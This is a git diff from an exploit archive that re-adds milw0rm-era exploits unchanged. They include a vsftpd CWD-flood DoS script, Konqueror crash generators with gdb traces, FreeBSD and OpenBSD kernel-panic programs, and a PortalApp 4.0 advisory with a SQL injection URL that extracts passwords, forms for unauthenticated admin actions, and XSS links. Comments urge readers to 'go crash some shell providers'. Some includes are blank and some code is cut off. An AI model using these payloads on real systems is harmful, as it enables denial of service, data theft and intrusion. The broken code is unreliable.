b/platforms/linux/dos/5814.pl index 0775878f9..9e698d837 100755 --- a/platforms/linux/dos/5814.pl +++ b/platforms/linux/dos/5814.pl @@ -1,35 +1,35 @@ -#!/usr/bin/perl -w - - -####################################################################################### -# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8, -# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability. -# -# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration -# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed. -# -# I tried to modify local exploit found at securityfocus such that we can remotely exloit -# -# Author shall not bear any responsibility -# Author: Praveen Darshanam -# Email: praveen[underscore]recker[at]sify.com -# Date: 07th June, 2008 -# -# -######################################################################################## - - -use Net::FTP; -$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n"; -$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry"; - -while(1) -{ -#this loop runs infinitely - -$ftp -> cwd(); -} - -$ftp->quit; - -# milw0rm.com [2008-06-14] +#!/usr/bin/perl -w + + +####################################################################################### +# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8, +# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability. +# +# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration +# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed. +# +# I tried to modify local exploit found at securityfocus such that we can remotely exloit +# +# Author shall not bear any responsibility +# Author: Praveen Darshanam +# Email: praveen[underscore]recker[at]sify.com +# Date: 07th June, 2008 +# +# +######################################################################################## + + +use Net::FTP; +$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n"; +$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry"; + +while(1) +{ +#this loop runs infinitely + +$ftp -> cwd(); +} + +$ftp->quit; + +# milw0rm.com [2008-06-14] diff --git a/platforms/linux/dos/6689.txt b/platforms/linux/dos/6689.txt index 1e2a48a55..769e71f0c 100755 --- a/platforms/linux/dos/6689.txt +++ b/platforms/linux/dos/6689.txt @@ -1,96 +1,96 @@ -Konqueror isn't immune from fuzzing either -Konqueror, KDE's mighty mascot browser.. fuzzed. - -perl -e 'print "\n" . ""' > kdie.html - -#6 0xb7f8d410 in __kernel_vsyscall () -#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6 -#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6 -#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 -#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6 -#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6 -#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6 -#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6 -#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3 -#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3 -#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4 -#17 0xb60d143b in DOM::CSSParser::parseColorFromValue () -from /usr/lib/libkhtml.so.4 -#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4 -#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 -#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4 -#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4 -#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 -#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4 -#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4 -#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4 -#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4 -#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4 -#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4 -#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4 -#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4 -#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4 -#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4 -#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4 -#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4 -#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4 -#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4 -#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4 -#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 -#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 -#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4 -#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4 -#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3 -#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3 -#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3 -#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3 -#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4 -#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3 -#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers () -from /usr/lib/libqt-mt.so.3 -#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3 -#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3 -#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3 -#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3 -#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so -#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so -#59 0x0804ee20 in ?? () -#60 0x0804f541 in ?? () -#61 0x0804fa7b in ?? () -#62 0x0805057d in ?? () -#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6 -#64 0x0804bb91 in ?? () - -Looks like it might have something to do with libx11... - -konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed. - -Program received signal SIGABRT, Aborted. -[Switching to Thread 0xb660f6c0 (LWP 10553)] -0xb7eef410 in __kernel_vsyscall () -(gdb) i r -eax 0x0 0 -ecx 0x2939 10553 -edx 0x6 6 -ebx 0x2939 10553 -esp 0xbf855efc 0xbf855efc -ebp 0xbf855f18 0xbf855f18 -esi 0x2939 10553 -edi 0xb7cd8ff4 -1211265036 -eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16> -eflags 0x206 [ PF IF ] -cs 0x73 115 -ss 0x7b 123 -ds 0x7b 123 -es 0x7b 123 -fs 0x0 0 -gs 0x33 51 -(gdb) - -Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. - -# milw0rm.com [2008-10-06] +Konqueror isn't immune from fuzzing either +Konqueror, KDE's mighty mascot browser.. fuzzed. + +perl -e 'print "\n" . ""' > kdie.html + +#6 0xb7f8d410 in __kernel_vsyscall () +#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6 +#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6 +#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 +#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6 +#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6 +#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6 +#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6 +#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3 +#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3 +#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4 +#17 0xb60d143b in DOM::CSSParser::parseColorFromValue () +from /usr/lib/libkhtml.so.4 +#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4 +#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 +#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4 +#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4 +#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 +#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4 +#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4 +#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4 +#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4 +#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4 +#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4 +#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4 +#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4 +#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4 +#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4 +#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4 +#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4 +#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4 +#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4 +#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4 +#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 +#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 +#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4 +#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4 +#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3 +#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3 +#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3 +#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3 +#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4 +#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3 +#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers () +from /usr/lib/libqt-mt.so.3 +#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3 +#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3 +#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3 +#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3 +#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so +#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so +#59 0x0804ee20 in ?? () +#60 0x0804f541 in ?? () +#61 0x0804fa7b in ?? () +#62 0x0805057d in ?? () +#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6 +#64 0x0804bb91 in ?? () + +Looks like it might have something to do with libx11... + +konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed. + +Program received signal SIGABRT, Aborted. +[Switching to Thread 0xb660f6c0 (LWP 10553)] +0xb7eef410 in __kernel_vsyscall () +(gdb) i r +eax 0x0 0 +ecx 0x2939 10553 +edx 0x6 6 +ebx 0x2939 10553 +esp 0xbf855efc 0xbf855efc +ebp 0xbf855f18 0xbf855f18 +esi 0x2939 10553 +edi 0xb7cd8ff4 -1211265036 +eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16> +eflags 0x206 [ PF IF ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 +(gdb) + +Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. + +# milw0rm.com [2008-10-06] diff --git a/platforms/linux/dos/6704.txt b/platforms/linux/dos/6704.txt index 7c2a880fa..56afed24a 100755 --- a/platforms/linux/dos/6704.txt +++ b/platforms/linux/dos/6704.txt @@ -1,12 +1,12 @@ -KDE's Konqueror & Color Attribute Love - -perl -e 'print "\n" . "\n"' > kdie.html -perl -e 'print "\n" . "

\n"' > kdie2.html -perl -e 'print "\n" . "

Upload File


- Icon:
- Show Signature:
- Notify:
- Locked:
- Sticky:
- Date:
- DateLast:
- - - - -delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID] -delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID] -delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID] -delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID] - -#There some other actions: -insert_level3_edit_disc_replies -insert_detail_disc_topics -update_level1_edit_disc_forums -update_level2_edit_disc_topics -update_level3_edit_disc_replies -update_detail_disc_topics -update_level2_disc_replies - - -############################################################################## -#Following actions in 'Content.asp' can take done without any authentication.# -############################################################################## -Add content: - -
- userid:by default 255 is sa
- ContentTypeID:1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...
- catID:
- Date:
- Author:
- title:
- ShortDesc:

- LongDesc:

- relatedULR
- DownloadURL:
- Filename:
- Thumbnail:
- Image1:
- PrevContentID:
- NextContentID:
- views:
- AVGRating:
- -
- - -'insert_detail_content' is also vulnerable. Use above html code for exploit - - -############################################################################## -# XSS # -############################################################################## -http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 -http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 - -# milw0rm.com [2008-01-06] +############################################################################## +#Title: PortalApp 4.0 Multiple vulnerabilities # +# # +#Discovered By: r3dm0v3 # +# http://r3dm0v3.persianblog.ir # +# r3dm0v3( 4t }yahoo[dot}com # +# Tehran - Iran # +# # +#Vendor: http://www.portalapp.com # +#Vulnerable Version: 4.0, prior versions maybe vulnerable # +#Remote Exploit: Yes # +#Dork: "Copyright @2007 Iatek LLC" # +#Fix: Not Available # +############################################################################## + +############################################################################## +# SQL Injection (CRITICAL) # +############################################################################## +#Description: +PortalApp is a Content Management System (CMS) for websites. +Bug: The user input 'sortby' is directly used in query statement! + +#Exploit: +http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users + +author will be usernames +topic will be passwords +replies will be username IDs +views will be access levels (5 is super admin) + + +############################################################################## +# Following actions in 'forum.asp' can take done without any authentication. # +############################################################################## +create a forum: + +
+ userid:by default 255 is sa
+ ForumName:
+ Description:
+ ForumSection:
+ DisplayOrder:
+ +
+ + +create a topic: + +
+ userid:by default 255 is sa
+ ForumID:
+ Subject:
+ Message:
diff --git a/platforms/bsd/dos/1540.pl b/platforms/bsd/dos/1540.pl index b7e0d665a..370b6c226 100755 --- a/platforms/bsd/dos/1540.pl +++ b/platforms/bsd/dos/1540.pl @@ -1,31 +1,31 @@ -#!/usr/bin/perl -## Saw an advisory on Dailydave and wrote a little script to -## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com) -## -## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel. -## Evgeny Legerov -## www.gleg.net - -use IO::Socket; - -sub usage -{ - print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n"; - print "Advisory from Evgeny Legerov (www.gleg.net)\n"; - print "Code by str0ke (milw0rm.com)\n"; - print "Usage: $0 www.example.com\n"; - exit (); -} - -my $host = shift || &usage; - -my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" . - "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" . - "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" . - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" . - "\x2f\x74\x6d\x70"; - -$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n"; -print $socket $printer . "\n"; - -# milw0rm.com [2006-02-28] +#!/usr/bin/perl +## Saw an advisory on Dailydave and wrote a little script to +## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com) +## +## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel. +## Evgeny Legerov +## www.gleg.net + +use IO::Socket; + +sub usage +{ + print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n"; + print "Advisory from Evgeny Legerov (www.gleg.net)\n"; + print "Code by str0ke (milw0rm.com)\n"; + print "Usage: $0 www.example.com\n"; + exit (); +} + +my $host = shift || &usage; + +my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" . + "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" . + "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" . + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" . + "\x2f\x74\x6d\x70"; + +$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n"; +print $socket $printer . "\n"; + +# milw0rm.com [2006-02-28] diff --git a/platforms/bsd/dos/2524.c b/platforms/bsd/dos/2524.c index 8037a10dc..81374e845 100755 --- a/platforms/bsd/dos/2524.c +++ b/platforms/bsd/dos/2524.c @@ -1,14 +1,14 @@ -#include -#include -#include -/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419 -thank you oh unknown, sincerely kokanin@gmail. usage: ./blah */ - -int main(int argc, char *argv[]){ - struct ptrace_lwpinfo *lol; - ptrace(PT_ATTACH,atoi(argv[1]),NULL,0); - wait(NULL); - ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768); -} - -// milw0rm.com [2006-10-12] +#include +#include +#include +/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419 +thank you oh unknown, sincerely kokanin@gmail. usage: ./blah */ + +int main(int argc, char *argv[]){ + struct ptrace_lwpinfo *lol; + ptrace(PT_ATTACH,atoi(argv[1]),NULL,0); + wait(NULL); + ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768); +} + +// milw0rm.com [2006-10-12] diff --git a/platforms/bsd/dos/2541.c b/platforms/bsd/dos/2541.c index 70aaf1619..c43994054 100755 --- a/platforms/bsd/dos/2541.c +++ b/platforms/bsd/dos/2541.c @@ -1,27 +1,27 @@ -/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC - Log: According to POSIX, the result of ftruncate(2) is unspecified - for file types other than VREG, VDIR and shared memory objects. - We already handle VREG, VLNK and VDIR cases. Silently ignore - truncate requests for all the rest. PR kern/98064 - - lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"! - tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing) - - it just makes the system reboot, and with a bit of luck fucks up the filesystem. - wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever. - usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers. - -*/ - -#include -#include -#include -#include - -int main(){ -mkfifo("lol",0x1b6); -int fd = open("lol",O_RDWR); -ftruncate(fd,12345); -close(fd); -} - -// milw0rm.com [2006-10-13] +/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC + Log: According to POSIX, the result of ftruncate(2) is unspecified + for file types other than VREG, VDIR and shared memory objects. + We already handle VREG, VLNK and VDIR cases. Silently ignore + truncate requests for all the rest. PR kern/98064 + + lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"! + tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing) + - it just makes the system reboot, and with a bit of luck fucks up the filesystem. + wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever. + usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers. + +*/ + +#include +#include +#include +#include + +int main(){ +mkfifo("lol",0x1b6); +int fd = open("lol",O_RDWR); +ftruncate(fd,12345); +close(fd); +} + +// milw0rm.com [2006-10-13] diff --git a/platforms/bsd/dos/2542.c b/platforms/bsd/dos/2542.c index 2608a73ea..2f3ca26eb 100755 --- a/platforms/bsd/dos/2542.c +++ b/platforms/bsd/dos/2542.c @@ -1,16 +1,16 @@ -/* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21 00:40:38 UTC - Log: Don't allow non-root user to set a scheduler policy, otherwise this could be a local DOS. - lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"! - tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE, 6.1-RELEASE-p10 (latest at the time of writing) - wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever. - usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers. -*/ -#include -int main(){ -struct sched_param lol; -lol.sched_priority = sched_get_priority_max(SCHED_FIFO); -sched_setscheduler(0,SCHED_FIFO,&lol); -for(;;){} -} - -// milw0rm.com [2006-10-13] +/* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21 00:40:38 UTC + Log: Don't allow non-root user to set a scheduler policy, otherwise this could be a local DOS. + lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"! + tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE, 6.1-RELEASE-p10 (latest at the time of writing) + wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever. + usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers. +*/ +#include +int main(){ +struct sched_param lol; +lol.sched_priority = sched_get_priority_max(SCHED_FIFO); +sched_setscheduler(0,SCHED_FIFO,&lol); +for(;;){} +} + +// milw0rm.com [2006-10-13] diff --git a/platforms/bsd/dos/2639.c b/platforms/bsd/dos/2639.c index 59eda541f..bb845bc4b 100755 --- a/platforms/bsd/dos/2639.c +++ b/platforms/bsd/dos/2639.c @@ -1,39 +1,39 @@ -// Evgeny Legerov (elegerov.blogspot.com) - -#include unistd.h -#include sys/types.h -#include stdio.h -#include fcntl.h -#include crypto/cryptodev.h - -int main() -{ - int fd2, fd; - struct crypt_kop kop; - - printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n"); - - fd2 = open("/dev/crypto", O_RDWR, 0); - if (fd2 == -1){ - perror("open"); - exit(-1); - } - - if (ioctl(fd2, CRIOGET, &fd) == -1) { - perror("ioctl"); - exit(-1); - } - - kop.crk_op = CRK_MOD_EXP; - kop.crk_iparams = 3; - kop.crk_oparams = 1; - kop.crk_param[0].crp_nbits = 0x70000000; - - ioctl(fd, CIOCKEY, &kop); - - printf("exploit failed\n"); - - return 0; -} - -// milw0rm.com [2006-10-24] +// Evgeny Legerov (elegerov.blogspot.com) + +#include unistd.h +#include sys/types.h +#include stdio.h +#include fcntl.h +#include crypto/cryptodev.h + +int main() +{ + int fd2, fd; + struct crypt_kop kop; + + printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n"); + + fd2 = open("/dev/crypto", O_RDWR, 0); + if (fd2 == -1){ + perror("open"); + exit(-1); + } + + if (ioctl(fd2, CRIOGET, &fd) == -1) { + perror("ioctl"); + exit(-1); + } + + kop.crk_op = CRK_MOD_EXP; + kop.crk_iparams = 3; + kop.crk_oparams = 1; + kop.crk_param[0].crp_nbits = 0x70000000; + + ioctl(fd, CIOCKEY, &kop); + + printf("exploit failed\n"); + + return 0; +} + +// milw0rm.com [2006-10-24] diff --git a/platforms/bsd/dos/343.c b/platforms/bsd/dos/343.c index 89a2e12db..e7eeac11a 100755 --- a/platforms/bsd/dos/343.c +++ b/platforms/bsd/dos/343.c @@ -325,6 +325,6 @@ in_cksum(u_short *addr, int len) sum += (sum >> 16); answer = ~sum; return(answer); -} - -// milw0rm.com [2002-09-17] +} + +// milw0rm.com [2002-09-17] diff --git a/platforms/bsd/dos/4935.c b/platforms/bsd/dos/4935.c index 174dd5efe..9fdbc99a9 100755 --- a/platforms/bsd/dos/4935.c +++ b/platforms/bsd/dos/4935.c @@ -1,64 +1,64 @@ -/* - * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl] - * Null Pointer Dereference local Denial of Service Exploit - * - * by Hunger - * - * Advisory: - * http://marc.info/?l=openbsd-security-announce&m=120007327504064 - * - * FOR TESTING PURPOSES ONLY! - * - * $ uname -mrsv - * OpenBSD 4.2 GENERIC#375 i386 - * $ id - * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) - * $ ftp -V http://hunger.hu/rtlabdos.c - * 100% |******************************************| 1814 00:00 - * $ gcc rtlabdos.c -o rtlabdos - * $ ./rtlabdos - * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e - * kernel: page fault trap, code=0 - * Stopped at strlcpy+0x1c: movb 0(%edx),%al - * ddb> trace - * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c - * ifioctl(d6033280,c0206983,d826fe78,d616696c,d61772a0) at ifioctl+0xa0d - * sys_ioctl(d616696c,d826ff68,d826ff58,1c000680,73) at sys_ioctl+0x125 - * syscall() at syscall+0x24a - * --- syscall (number 54) --- - * 0xf557d1: - * ddb> show registers - * ds 0x10 - * es 0x10 - * fs 0x58 - * gs 0x10 - * edi 0 - * esi 0x20 - * ebp 0xd826fd60 end+0x7a33a90 - * ebx 0xd826fd98 end+0x7a33ac8 - * edx 0 - * ecx 0x1f - * eax 0 - * eip 0xd064acb0 strlcpy+0x1c - * cs 0x8 - * eflags 0x10212 - * esp 0xd826fd54 end+0x7a33a84 - * ss 0xd8260010 end+0x7a23d40 - * strlcpy+0x1c: movb 0(%edx),%al - * - */ - -#include -#include -#include -#include - -int -main(void) -{ -struct ifreq ifr = { .ifr_name = "lo0" }; - -return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr); -} - -// milw0rm.com [2008-01-18] +/* + * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl] + * Null Pointer Dereference local Denial of Service Exploit + * + * by Hunger + * + * Advisory: + * http://marc.info/?l=openbsd-security-announce&m=120007327504064 + * + * FOR TESTING PURPOSES ONLY! + * + * $ uname -mrsv + * OpenBSD 4.2 GENERIC#375 i386 + * $ id + * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) + * $ ftp -V http://hunger.hu/rtlabdos.c + * 100% |******************************************| 1814 00:00 + * $ gcc rtlabdos.c -o rtlabdos + * $ ./rtlabdos + * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e + * kernel: page fault trap, code=0 + * Stopped at strlcpy+0x1c: movb 0(%edx),%al + * ddb> trace + * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c + * ifioctl(d6033280,c0206983,d826fe78,d616696c,d61772a0) at ifioctl+0xa0d + * sys_ioctl(d616696c,d826ff68,d826ff58,1c000680,73) at sys_ioctl+0x125 + * syscall() at syscall+0x24a + * --- syscall (number 54) --- + * 0xf557d1: + * ddb> show registers + * ds 0x10 + * es 0x10 + * fs 0x58 + * gs 0x10 + * edi 0 + * esi 0x20 + * ebp 0xd826fd60 end+0x7a33a90 + * ebx 0xd826fd98 end+0x7a33ac8 + * edx 0 + * ecx 0x1f + * eax 0 + * eip 0xd064acb0 strlcpy+0x1c + * cs 0x8 + * eflags 0x10212 + * esp 0xd826fd54 end+0x7a33a84 + * ss 0xd8260010 end+0x7a23d40 + * strlcpy+0x1c: movb 0(%edx),%al + * + */ + +#include +#include +#include +#include + +int +main(void) +{ +struct ifreq ifr = { .ifr_name = "lo0" }; + +return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr); +} + +// milw0rm.com 